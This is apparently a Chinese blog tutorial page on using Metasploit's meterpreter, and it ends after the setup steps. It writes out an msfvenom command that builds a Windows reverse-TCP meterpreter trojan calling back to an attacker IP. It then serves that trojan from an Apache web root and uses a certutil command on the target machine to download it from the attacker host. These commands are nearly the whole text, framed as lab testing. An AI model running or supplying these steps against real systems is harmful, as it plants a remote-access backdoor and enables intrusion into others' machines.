热门标签 | HotTags
当前位置:  开发笔记 > 后端 > 正文

meterpreter的使用

meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作首先,我们使用metasploit中的另一个后门工

meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作


首先,我们使用metasploit中的另一个后门工具msfvenom生成一个木马,方便我们测试meterpreter

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=1234 -f exe -o /root/shell.exe



在/root目录生成了一个shell.exe文件,执行该程序回连地址为172.16.1.103端口为1234的木马

共享到windows电脑

service apache2 start打开Web服务

cp /root/shell.exe /var/www/html/,拷贝到Web服务目录



在靶机中执行命令下载木马到C:\根目录并使用dir查看

certutil -urlcache -split -f http://172.16.1.103/shell.exe C:\shell.exe



推荐阅读
author-avatar
mobiledu2502890451
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有